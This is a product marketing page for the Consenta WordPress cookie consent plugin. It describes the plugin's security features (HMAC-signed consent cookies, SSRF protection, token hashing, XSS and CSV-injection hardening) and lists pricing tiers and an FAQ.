Security-First Architecture | Consenta Cookie Consent

Security-First Architecture — Cookie Consent Built for Security

Consenta v1.7.0 introduces real HMAC-SHA256 for cookie signatures, protects all outgoing HTTP calls against SSRF and hardens the entire plugin architecture against modern attack vectors.

Get started — from 3 €/mo Explore features

14-day money-back · Cancel anytime · GDPR-compliant · Local in WordPress

Consenta WordPress Cookie Consent Dashboard
FLASH SALE — NOCHFLASH SALE — --:--:-- Agency Lifetime — 149 € 499 € Agency Lifetime — 149 € 499 € Jetzt sichern →Get the deal →
HMAC-SHA256
Cookie Signature
SSRF
Protection
SHA-256
Token Hashing
WCAG AA
Contrast

Why is security so important in a consent plugin?

A cookie consent plugin runs on every single page of your website, processes personal data and writes cookies with legal significance. It is therefore a critical part of your infrastructure — and a potential attack target. Manipulated consent cookies could simulate false consents and lead to GDPR violations. SSRF vulnerabilities in outgoing HTTP calls could expose internal network resources. Consenta addresses all these risks with a security-first architecture.

Security Features

Security Architecture in Detail

HMAC-SHA256 Consent Cookies

Consent cookies are signed with real HMAC-SHA256 using the WordPress AUTH_KEY. Server-side verification via hash_equals() protects against timing attacks. Unsigned cookies are consistently rejected.

SSRF Protection

All outgoing HTTP calls — webhooks, cookie scanner, geolocation — are secured by an SSRF guard. Private IP ranges, loopback addresses and internal network resources cannot be accessed.

SHA-256 Token Hashing at-rest

API tokens and access keys are never stored in plain text. SHA-256 hashes are stored in the database, so even with a database dump no valid tokens can be extracted.

Rate Limiting

REST API endpoints and AJAX handlers are equipped with rate limiting. Brute-force attacks on consent endpoints and admin actions are detected and blocked.

CSV Formula Injection Protection

CSV exports of consent data are protected against formula injection attacks. Cell contents are sanitized so no Excel macros or shell commands can be executed via exported data.

XSS Hardening

No style attribute is output unsanitized. All outputs pass through wp_kses() or esc_html(). Dynamic content in admin areas and frontend outputs is fully protected against cross-site scripting.

WCAG Contrast Enforcement

Consenta enforces WCAG AA-compliant contrast ratios for all UI elements of the consent banner. Customizations that would fall below the minimum contrast are prevented.

ABSPATH Guards & hash_equals()

All PHP files are protected against direct access with ABSPATH guards. All token comparisons use hash_equals() for timing-attack-safe checks — no direct string comparison for security-critical operations.

Background

Why Security is Critical in Cookie Consent

Runs on every page

A consent plugin is executed on every single page request. A single security vulnerability can therefore affect the entire website.

Processes personal data

Consent data such as IP addresses, timestamps and user decisions are personal data under the GDPR. Their protection is not optional.

Cookies with legal significance

The consent cookie documents a legally binding consent. If it is manipulated, this can lead to invalid consents and thus to GDPR violations.

Pricing

Subscribe monthly or pay once.

🔥 FLASH SALE — --:--:--
Agency Lifetime — 499 € 149 €
All Agency features, unlimited sites, no further costs.
Get Lifetime
Monthly Yearly 3 months free
STARTER
Starter
3
/month
cancel monthly · 1 WordPress site
27
/year
2.25 €/mo · 3 months free
  • 1 WordPress site
  • Consent dialog & banner
  • Cookie & script blocking
  • Cookie scanner
  • Google Consent Mode v2
  • IAB TCF 2.2
  • GPC signal (Do Not Sell)
  • Live editor (colors, logo)
  • Import/export
  • Browser API Blocking
  • Webhooks
  • Email support
Buy now

Cancel anytime

MOST POPULAR
Pro
6
/month
cancel monthly · 10 WordPress sites
54
/year
4.5 €/mo · 3 months free
  • 10 WordPress sites
  • Everything in Starter
  • Consent logging & CSV export
  • Geolocation
  • CCPA / CPRA (US opt-out)
  • Content blocker placeholders
  • Re-consent on change
  • 30+ languages
  • Custom CSS
  • Service worker blocking
  • Auto cache purge
  • Webhooks
  • Browser API Blocking
  • Priority support
Buy now

Cancel anytime · 14-day money back

AGENCY & FREELANCER
Agency
12
/month
cancel monthly · unlimited sites
108
/year
9 €/mo · 3 months free
  • Unlimited WordPress sites
  • Everything in Pro
  • Multi-site central dashboard
  • REST API access
  • Branded reports
  • Custom consent texts
  • Dedicated support
  • + White-Label Addon from 20 €/month · available separately
Start Agency

Cancel anytime · 14-day money back

FAQ

Questions about Security Architecture

How are consent cookies protected against tampering?
Consenta signs every consent cookie with real HMAC-SHA256 using the WordPress AUTH_KEY. On every page load the signature is verified server-side via hash_equals(). Cookies without a valid signature or with altered content are rejected.
What is SSRF and why is protection important?
SSRF (Server-Side Request Forgery) is an attack where an attacker causes a server to request internal network resources. Since Consenta makes HTTP calls for webhooks, the cookie scanner and geolocation, SSRF protection is essential. Consenta blocks all requests to private IP ranges and loopback addresses.
Are API tokens stored securely?
Yes. API tokens and access keys are stored exclusively as SHA-256 hashes in the database. The original token is not persisted after creation. Even with a complete database dump, no valid tokens can be extracted.
Is Consenta suitable for security audits?
Yes. Consenta follows WordPress Coding Standards, uses exclusively vetted cryptography primitives (HMAC-SHA256, SHA-256, hash_equals), protects all outputs against XSS and all inputs against injection. The plugin architecture is documented for security reviews.
Cookie Blocking Consent Dialog Cookie Banner Consent Widget Google Consent Mode v2 IAB TCF Cookie Scanner Consent Logs Geolocation Multi-Site White-Label A/B Testing Statistics Per-Service Consent WooCommerce WCAG 2.1 AA Auto-Scan Multi-Language REST API Consent Proof IP Anonymisation Gutenberg Block CMP Import Consent History Service Worker Blocking CCPA / CPRA CSV Export Webhooks RTL Support WP Privacy Tools PDF Export HMAC Consent Cookie Browser API Blocking GDPR Compliant All Features

Consent. Secure. From the ground up.

HMAC-SHA256 · SSRF Protection · Rate Limiting · XSS Hardening · WCAG AA · GDPR-compliant

Get started — from 3 €/mo All features

14-day money-back guarantee · Cancel anytime · Available in 30+ languages